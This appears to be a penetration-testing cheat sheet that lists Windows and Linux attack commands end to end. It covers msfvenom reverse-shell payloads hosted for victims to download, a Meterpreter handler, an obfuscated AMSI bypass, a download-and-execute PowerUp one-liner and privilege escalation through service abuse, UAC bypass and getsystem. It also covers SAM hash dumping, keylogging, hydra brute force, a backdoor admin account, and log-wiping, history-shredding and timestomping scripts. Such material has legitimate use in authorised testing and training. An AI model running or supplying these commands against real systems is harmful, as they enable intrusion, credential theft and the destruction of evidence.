Generate a Meterpreter reverse TCP payload as a 32-bit Windows executable (msfvenom):

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[IP Address of Host Machine] LPORT=[Port in the Host Machine] -o [Output Path/shellcode.exe]

Same payload passed through the shikata_ga_nai encoder, with the null byte declared as a bad character (-b "\x00") so it never appears in the output. LPORT defaults to 4444 when omitted. The encoder exists to remove bad characters; a single encoder pass is well known to current antivirus and should not be relied on for evasion:

msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=[IP Address of Host Machine] -f exe > Desktop/Backdoor.exe

Host the executable on the attacker's Apache web root so the victim can fetch it:

mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp [PATH]/shellcode.exe /var/www/html/share
service apache2 start

Download it on the victim machine from http://[IP Address of Host Machine]/share/shellcode.exe.
Start the handler in msfconsole and wait for the reverse connection:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [IP Address of Host Machine]
set LPORT [Port in the Host Machine]
exploit

Once the Meterpreter session opens, upload PowerUp.ps1 and drop into a command shell on the victim:

upload [PATH]/PowerUp.ps1 PowerUp.ps1
shell
powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

-ep bypass (short for -ExecutionPolicy Bypass) starts PowerShell with the execution policy set to Bypass for that process only, so the unsigned script can be imported. The execution policy is a safety feature against running scripts by accident, not a security boundary.
To disable AMSI in the current PowerShell process, run the one-liner below. Deobfuscated, it uses reflection to set the non-public static field amsiInitFailed of System.Management.Automation.AmsiUtils to $true, after which AMSI reports its initialisation as failed and stops scanning content in this process. The string splitting, mixed case and backtick escapes only exist to keep the snippet itself from matching AMSI's signature for this bypass:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Alternatively, load PowerUp straight from GitHub into memory and run all checks in one command (nothing is written to disk, but the download is visible on the network):

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HarmJ0y/PowerUp/master/PowerUp.ps1'); Invoke-AllChecks"

Abuse a vulnerable service reported by Invoke-AllChecks. By default PowerUp uses the service to add a new local administrator account:

Invoke-ServiceAbuse -Name 'Name of the vulnerable service'

Attempt to bypass Windows UAC via the FodHelper registry key using the bypassuac_fodhelper module. It needs an existing session running as a user who is a member of the local Administrators group and, if it works, returns a new high-integrity Meterpreter session:

use exploit/windows/local/bypassuac_fodhelper
set SESSION [ID of the existing session]
set LHOST [IP Address of Host Machine]
exploit

If it works, in some cases privileges can then be escalated to SYSTEM with getsystem. Technique 1 is Named Pipe Impersonation (In Memory/Admin):

getsystem -t 1

Dump the local account hashes from the SAM (run with SYSTEM privileges):

run post/windows/gather/smart_hashdump
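The unquoted service path check is one of the findings Invoke-AllChecks reports and Invoke-ServiceAbuse exploits. The following is an added example, written for this page and not taken from PowerUp or the original post, that performs that check by hand so the result can be verified before abusing a service: it lists services whose binary path is unquoted and contains a space, computes the candidate paths Windows will try before the real binary, and tests which of those directories the current user can actually write to. The function names and the file-probe approach are this example's own choices.

```powershell
# Added example, not from the original page or from PowerUp: a manual version
# of the unquoted-service-path check reported by Invoke-AllChecks.
# Run it as the low-privileged user whose rights you are assessing.

function Test-DirectoryWritable {
    # Try to create and delete a random file. Parsing ACLs is error-prone;
    # an actual write is the ground truth. It does touch the disk, so it is
    # not silent from an EDR's point of view.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try {
        [IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePath {
    # An unquoted binary path containing spaces is resolved by CreateProcess
    # by trying each space as a break point:
    #   C:\Program Files\My App\svc.exe -> C:\Program.exe,
    #   C:\Program Files\My.exe, and only then the real binary.
    # Planting an executable at one of the earlier candidates hijacks the
    # service the next time it starts.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            # non-empty, not already quoted, contains whitespace,
            # and not under %SystemRoot% (ACL-protected, never writable)
            $_.PathName -and
            $_.PathName -notmatch '^"' -and
            $_.PathName -match '\s' -and
            $_.PathName -notmatch '^[A-Za-z]:\\Windows\\'
        } |
        ForEach-Object {
            $svc = $_
            # Drop service arguments: keep everything up to the first ".exe".
            $exe = if ($svc.PathName -match '^(.*?\.exe)') { $Matches[1] } else { $svc.PathName }
            $tokens = $exe -split ' '
            for ($i = 1; $i -lt $tokens.Count; $i++) {
                $candidate = ($tokens[0..($i - 1)] -join ' ') + '.exe'
                $dir = Split-Path -Parent $candidate
                [PSCustomObject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    StartMode = $svc.StartMode
                    PathName  = $svc.PathName
                    Candidate = $candidate
                    Writable  = Test-DirectoryWritable -Path $dir
                }
            }
        }
}

# Usage: only rows with Writable = True are exploitable. A service that runs
# as LocalSystem with StartMode Auto is the one worth acting on, because it
# restarts at boot even if the current user cannot restart it.
Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

Writable is the condition that matters: an unquoted path alone is a finding, not a vulnerability, if every candidate directory is owned by Administrators. Before abusing a service also check who can start or stop it (sc.exe sdshow) or whether it starts automatically, since dropping the binary achieves nothing until the service is restarted.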
Clear the event logs. This requires administrative (or root) privileges. From Meterpreter, clearev wipes the Application, System and Security logs:

clearev

From an elevated Windows command prompt, clear every log that wevtutil lists (inside a .bat file the loop variable must be doubled, e.g. %%G instead of %1):

for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

The same as a batch script that refuses to run without administrative rights. bcdedit fails with "Access is denied" when the prompt is not elevated, which the script uses as its test:

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo All Event Logs have been cleared!
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo Current user permissions to execute this .BAT file are inadequate.
echo This .BAT file must be run with administrative privileges.
echo Exit now, right click on this .BAT file, and select "Run as administrator".
pause >nul
:theEnd
Exit
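A PowerShell counterpart to the batch script above, added here as an example and not part of the original page. It checks the process token for membership in the Administrators role instead of inferring elevation from bcdedit's error text, clears every log wevtutil lists, records the channels that refuse to be cleared instead of aborting, and supports -WhatIf for a dry run. Function names are this example's own.

```powershell
# Added example, not from the original page: clear all Windows event logs
# from an elevated PowerShell, with a proper elevation check.

function Test-IsAdministrator {
    # True when the current token holds the Administrators role, which in
    # practice means the process was started elevated (UAC consent given).
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Clear-AllEventLogs {
    [CmdletBinding(SupportsShouldProcess)]
    param()

    if (-not (Test-IsAdministrator)) {
        throw 'Run this from an elevated PowerShell (right-click, Run as administrator).'
    }

    $cleared = New-Object System.Collections.Generic.List[string]
    $failed  = New-Object System.Collections.Generic.List[string]

    foreach ($log in (wevtutil.exe el)) {
        # -WhatIf / -Confirm are honoured here
        if (-not $PSCmdlet.ShouldProcess($log, 'Clear event log')) { continue }
        # Some analytic/debug channels are disabled and cannot be cleared;
        # record them instead of stopping at the first error.
        wevtutil.exe cl "$log" 2>$null
        if ($LASTEXITCODE -eq 0) { $cleared.Add($log) } else { $failed.Add($log) }
    }

    [PSCustomObject]@{
        Cleared = $cleared.Count
        Failed  = $failed.ToArray()
    }
}

# Usage:
#   Clear-AllEventLogs -WhatIf    # list the logs that would be cleared
#   Clear-AllEventLogs            # clear them and report failures
```

Clearing logs is itself logged: wiping the Security log writes Event ID 1102 ("The audit log was cleared") into the freshly emptied log, and wiping the System log writes Event ID 104. Both are standard detection rules, and any events already forwarded to a collector or SIEM are untouched, so on a monitored host this is an alert rather than a cover-up.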
Overwrite the free (deallocated) space of a volume with the built-in Windows cipher tool so previously deleted data cannot be recovered. The path only selects the volume: cipher wipes unused space on that whole volume, it does not securely delete a specific file, so delete the file first and then wipe:

cipher /w:[Drive or Folder on the target volume]

Prevent the current bash session from keeping history and destroy the existing history file (Linux):

export HISTSIZE=0
shred ~/.bash_history && cat /dev/null > ~/.bash_history

Show a file's MACE timestamps with Meterpreter's timestomp, and set its modified time:

timestomp [FILE] -v
timestomp [FILE] -m "mm/dd/yyyy hh:mm:ss"

Start the Meterpreter keylogger and dump what it captured:

keyscan_start
keyscan_dump

Brute-force FTP logins with hydra from username and password wordlists:

hydra -L [USERNAMES DICTIONARY] -P [PASSWORDS DICTIONARY] ftp://[IP]

Create a local user and add it to the local Administrators group (Windows, elevated prompt):

net user Test /Add
net localgroup Administrators Test /Add

Generate an Android Meterpreter payload as an APK (msfvenom writes the APK when the output format is left at raw):

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=[LOCAL HOST] LPORT=[LOCAL PORT] -o payload.apk

© 2023 javierizquierdovera.com
Licensed under the Apache License, Version 2.0 (LICENSE-APACHE) or the MIT license (LICENSE-MIT), at your option.
SPDX-License-Identifier: (Apache-2.0 OR MIT)